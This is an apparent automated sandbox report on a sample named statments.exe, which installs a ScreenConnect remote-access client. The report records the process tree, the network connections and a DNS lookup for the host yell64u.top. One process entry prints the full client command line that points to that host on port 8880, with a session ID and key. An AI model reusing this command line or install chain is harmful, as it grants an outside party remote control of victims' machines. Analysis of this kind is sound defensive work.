                                                                                  KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                                  OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 17, 2024 20:03:23.880078077 CEST497068880192.168.2.885.239.34.190
                                                                                  Oct 17, 2024 20:03:23.885236025 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:23.885351896 CEST497068880192.168.2.885.239.34.190
                                                                                  Oct 17, 2024 20:03:25.183773041 CEST497068880192.168.2.885.239.34.190
                                                                                  Oct 17, 2024 20:03:25.430960894 CEST497068880192.168.2.885.239.34.190
                                                                                  Oct 17, 2024 20:03:25.567706108 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:25.568682909 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:25.844679117 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:25.874753952 CEST497068880192.168.2.885.239.34.190
                                                                                  Oct 17, 2024 20:03:25.879587889 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:26.172477007 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:26.172772884 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:26.172919035 CEST497068880192.168.2.885.239.34.190
                                                                                  Oct 17, 2024 20:03:27.470788002 CEST497068880192.168.2.885.239.34.190
                                                                                  Oct 17, 2024 20:03:27.470835924 CEST497068880192.168.2.885.239.34.190
                                                                                  Oct 17, 2024 20:03:27.475809097 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:27.475824118 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:27.475848913 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:27.475980997 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:27.475992918 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:27.765455961 CEST88804970685.239.34.190192.168.2.8
                                                                                  Oct 17, 2024 20:03:27.837152958 CEST497068880192.168.2.885.239.34.190
                                                                                  Oct 17, 2024 20:04:27.774779081 CEST497068880192.168.2.885.239.34.190
                                                                                  Oct 17, 2024 20:04:27.779726028 CEST88804970685.239.34.190192.168.2.8
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 17, 2024 20:03:22.758383989 CEST5187353192.168.2.81.1.1.1
                                                                                  Oct 17, 2024 20:03:23.647327900 CEST53518731.1.1.1192.168.2.8
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Oct 17, 2024 20:03:22.758383989 CEST192.168.2.81.1.1.10xb36Standard query (0)yell64u.topA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Oct 17, 2024 20:03:23.647327900 CEST1.1.1.1192.168.2.80xb36No error (0)yell64u.top85.239.34.190A (IP address)IN (0x0001)false

                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:1
                                                                                  Start time:14:03:11
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Users\user\Desktop\statments.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\statments.exe"
                                                                                  Imagebase:0x410000
                                                                                  File size:5'652'448 bytes
                                                                                  MD5 hash:95C83010549BC9FE36A625307CF6CD8D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.1565481069.0000000005740000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.1549465731.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:14:03:14
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                                                                                  Imagebase:0x620000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:14:03:14
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                  Imagebase:0x7ff7eac90000
                                                                                  File size:69'632 bytes
                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:4
                                                                                  Start time:14:03:16
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding AB83296B808D1A3E5D9792E4DDFA12DB C
                                                                                  Imagebase:0x620000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:14:03:16
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2F66.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5058640 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                  Imagebase:0xf0000
                                                                                  File size:61'440 bytes
                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:14:03:19
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 28425576B87BE497C2D29F2837F582DA
                                                                                  Imagebase:0x620000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:14:03:20
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E415C9D2D8304B77F88CF36FA73BEA3D E Global\MSI0000
                                                                                  Imagebase:0x620000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:14:03:20
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Java&c=&c=IT&c=&c=&c=&c=&c="
                                                                                  Imagebase:0x5a0000
                                                                                  File size:95'520 bytes
                                                                                  MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:10
                                                                                  Start time:14:03:22
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f60a8250-1d8c-4e56-b41b-ff082dd1b17d" "User"
                                                                                  Imagebase:0x700000
                                                                                  File size:601'376 bytes
                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2791566703.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:11
                                                                                  Start time:14:03:25
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f69440ce-931d-49a5-a5c7-2a17bc772f20" "System"
                                                                                  Imagebase:0x490000
                                                                                  File size:601'376 bytes
                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Reset < >
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: 3fe86013077ffae6325c141d9c915c019be56d87bdabcdf67c3376713fad1e5a
                                                                                    • Instruction ID: 0d32f83209f814cb63fb46a0afb4a2b7e7615967857fb223d1f3d6d3183f94d3
                                                                                    • Opcode Fuzzy Hash: 3fe86013077ffae6325c141d9c915c019be56d87bdabcdf67c3376713fad1e5a
                                                                                    • Instruction Fuzzy Hash: C9524834A10219CFDB199F64D944B9DBBB6FFC9304F1085A9E909AB358CB71AD85CF80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: 2775398618c753c5218cbfa1021800206e7c70c8d910b2dcb3941a3e4d32ec0c
                                                                                    • Instruction ID: c1d6ad037ea82ad6ceab783536a7a7b4ebec12e93b4ac7324301401045401370
                                                                                    • Opcode Fuzzy Hash: 2775398618c753c5218cbfa1021800206e7c70c8d910b2dcb3941a3e4d32ec0c
                                                                                    • Instruction Fuzzy Hash: F7422B34A10218CFDB19DF64D9447ADBBB6FBC9304F1085A9E909AB358CB71AD85DF80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5cc257fe023bf82df470514127697f0478b22b97cd2a1d321ca135d6ada223dc
                                                                                    • Instruction ID: 08ff58431e51259a733db2cffe1f4ce9b8220f04a874fcba50c125ddd6e71fd9
                                                                                    • Opcode Fuzzy Hash: 5cc257fe023bf82df470514127697f0478b22b97cd2a1d321ca135d6ada223dc
                                                                                    • Instruction Fuzzy Hash: F6629170A007069FCB18DF68D480AAEFBF2FF88320B148569E5199B795DB31ED41CB91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: C8${/
                                                                                    • API String ID: 0-4231431693
                                                                                    • Opcode ID: b35cc70abbe61f68e06664dfe038baf869da58264f8be4f98f86b10bd5314618
                                                                                    • Instruction ID: 5562382c74441d06ec9caf480846d3f8354aac4318665c9626c961dc1a44d3a9
                                                                                    • Opcode Fuzzy Hash: b35cc70abbe61f68e06664dfe038baf869da58264f8be4f98f86b10bd5314618
                                                                                    • Instruction Fuzzy Hash: FE5190313103024BC70AAABDEA9166E77E6FBC5664754C228D816CB788EF70AD418B95
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: K]
                                                                                    • API String ID: 0-3798347547
                                                                                    • Opcode ID: 842454db160d137ae2a13bd2b03045201ef5953dc1c03c1ada360261ec8673bd
                                                                                    • Instruction ID: a58f5b2613149a7861d9c4a73100e59abd274f3f40c2a49e68430a5ebfef5852
                                                                                    • Opcode Fuzzy Hash: 842454db160d137ae2a13bd2b03045201ef5953dc1c03c1ada360261ec8673bd
                                                                                    • Instruction Fuzzy Hash: E941A331A143409FDB05AF78E89179ABBB5FF82620F54C466D845CF256EB34D805CBA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: s+
                                                                                    • API String ID: 0-1285507049
                                                                                    • Opcode ID: c44789949a8aa1389439c0a71931c40f1810a889ab1b0c6d218a1a6536096644
                                                                                    • Instruction ID: 24f03967f6a5c5f05ea84f02333423aef54fc135a1878f223e1f42672fd3491e
                                                                                    • Opcode Fuzzy Hash: c44789949a8aa1389439c0a71931c40f1810a889ab1b0c6d218a1a6536096644
                                                                                    • Instruction Fuzzy Hash: A0418231A00319DFDF05DFA4E890A9EBBB6BFC5320F148569E905AB244DB70AD46CBD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: s+
                                                                                    • API String ID: 0-1285507049
                                                                                    • Opcode ID: 9cc08c18a166492d38798eef29acf358ead2aee6f98ff2e478fb4a7340bf4f78
                                                                                    • Instruction ID: 6523c6ed86bd72a98b4e80ed016e12ca1cc6a2cd67994b349233caf649c14954
                                                                                    • Opcode Fuzzy Hash: 9cc08c18a166492d38798eef29acf358ead2aee6f98ff2e478fb4a7340bf4f78
                                                                                    • Instruction Fuzzy Hash: 0B41B331A10315DBDF05DFA4D890E9EBBB2BFC5320F148569E905AB344DB70AD46CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 2
                                                                                    • API String ID: 0-450215437
                                                                                    • Opcode ID: 8157201043817a324b02988a9b5933c41c8a5c881712924c03e2c5ab6035d25e
                                                                                    • Instruction ID: 829ce9edbfb999c05ec7becb2674737039729c12f81f31312a3c338c5188c000
                                                                                    • Opcode Fuzzy Hash: 8157201043817a324b02988a9b5933c41c8a5c881712924c03e2c5ab6035d25e
                                                                                    • Instruction Fuzzy Hash: E6419130B00209ABEB18ABA9D854BADBBF6FF88710F204439E515B73C4DF759D018B94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3c0367aae0f686904584ae338af07c7d44e36d56e621e3395a44d128e22274e0
                                                                                    • Instruction ID: 1ad43a930e53e6cb74378b6c6d58ce497b21b1db170d918c68ac190d00dd8100
                                                                                    • Opcode Fuzzy Hash: 3c0367aae0f686904584ae338af07c7d44e36d56e621e3395a44d128e22274e0
                                                                                    • Instruction Fuzzy Hash: 1A524875A002059FCB14DF68C984AAEBBF2FF88311F158469E959AB6A5D730EC41CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e46f440ec5de29d8a9d88891268002b5fb8fadb4cbfeb8ef508653d017b7e336
                                                                                    • Instruction ID: 01d2e2798aba65d4ec2c6755897b346f482a471598e734e06a0cea8b85627be7
                                                                                    • Opcode Fuzzy Hash: e46f440ec5de29d8a9d88891268002b5fb8fadb4cbfeb8ef508653d017b7e336
                                                                                    • Instruction Fuzzy Hash: 53F1BD70B003158FDB14DB68C840B6ABBE2BF89210F14C4AAD6599F796DB74EC46CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e0d2ff7a6759a3ed615ff121b4e7a7f4b341f3c2f3c1cc0fb37edd4aa98784ea
                                                                                    • Instruction ID: 47b4b4918e0534285adfddf79abf1f6a09a8804e4d41dbdd1e1127fbf446e728
                                                                                    • Opcode Fuzzy Hash: e0d2ff7a6759a3ed615ff121b4e7a7f4b341f3c2f3c1cc0fb37edd4aa98784ea
                                                                                    • Instruction Fuzzy Hash: 3BD17C70B042069FCB18DF64C894A6FBBF2FF88310B548569E506DB385DB35AC82CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7706bdc040b3a4f371e1d641e269f621dc0a633c1e90a4524fe9aebe255fd50f
                                                                                    • Instruction ID: 0efabb521f359ec7fec5f13a88888ab46a40e0afd753293b55dae192c1b0cc06
                                                                                    • Opcode Fuzzy Hash: 7706bdc040b3a4f371e1d641e269f621dc0a633c1e90a4524fe9aebe255fd50f
                                                                                    • Instruction Fuzzy Hash: E5C10535A0020AEFCF05DFA8D8809AEBBB6FF49314F248459E955AB351D731E916CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5d388266fc6bb1810baf74e524bc565b2e866286d81d7cd3ebd11b9d0b6da209
                                                                                    • Instruction ID: 7af690b482db4964b5b7a9f2f022a178301626a6fc920e65944f3eabe55dc71f
                                                                                    • Opcode Fuzzy Hash: 5d388266fc6bb1810baf74e524bc565b2e866286d81d7cd3ebd11b9d0b6da209
                                                                                    • Instruction Fuzzy Hash: 5BC1F374A006059FDB14DF68C988E6AB7F2FF88311F158469E919AB7A5D730EC41CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c7f98340db9e853ef11b752c07b49b7ea34236690a2ef2c62795e481fd20047c
                                                                                    • Instruction ID: 7f1c2e1b30ce6ecd16ae803aba20ac07d55ab41b7fadab2ef2d386147b19237b
                                                                                    • Opcode Fuzzy Hash: c7f98340db9e853ef11b752c07b49b7ea34236690a2ef2c62795e481fd20047c
                                                                                    • Instruction Fuzzy Hash: 05B198716007059FDB24CF68C880A6AFBF2FF88315B548969E54ADB651D731FC41CBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ae253130c040f89352753015258d36d9393ef4a1636299bf3af986929053ab76
                                                                                    • Instruction ID: 3f334aa5423c254fd6417b15295c12a060909b6a24574d60c57a68727e1b5285
                                                                                    • Opcode Fuzzy Hash: ae253130c040f89352753015258d36d9393ef4a1636299bf3af986929053ab76
                                                                                    • Instruction Fuzzy Hash: 40A10634B00619CFDB14DFA8C594AADB7F2BF88610B1485A8E506AB364DB71ED41CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6cf8612d03cee0113b8c743392064990a0f40fdd9aa934be3d340b5e13726c81
                                                                                    • Instruction ID: 4271945378d878ae3fd1a361df16ba52e55152545167fe5bbd00362e67f3dd59
                                                                                    • Opcode Fuzzy Hash: 6cf8612d03cee0113b8c743392064990a0f40fdd9aa934be3d340b5e13726c81
                                                                                    • Instruction Fuzzy Hash: 04910534B00619CFDB14DFA8D594AADBBF2BF89710B1485A8E506AB364DB70ED41CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ec9804c5755c59ccd90d536686048ef19c2dfa4c337863f7d9bd47ba4f6658e0
                                                                                    • Instruction ID: cc894e268dcf77cdc92387cf2a42728af449b99ca2caa2c68cf50cd10b5529da
                                                                                    • Opcode Fuzzy Hash: ec9804c5755c59ccd90d536686048ef19c2dfa4c337863f7d9bd47ba4f6658e0
                                                                                    • Instruction Fuzzy Hash: 16914874B002059FDB19EBA8D594A6DBBF2FF88704B148529E81ADB758DF70EC018B81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 623746aa89c19efc4983c3c9aa178e6f36eb5dc610b430934c8b34aeff3884ed
                                                                                    • Instruction ID: 2aa9bda7e2fde140d04895bf42416cfd5baec301b11d3e75056cd08159816ecf
                                                                                    • Opcode Fuzzy Hash: 623746aa89c19efc4983c3c9aa178e6f36eb5dc610b430934c8b34aeff3884ed
                                                                                    • Instruction Fuzzy Hash: 0581AD75A006058FC704DF68C884F6EBBF2FF89321B1584AAE9499B351DB31EC41CBA1
                                                                                    Memory Dump Source
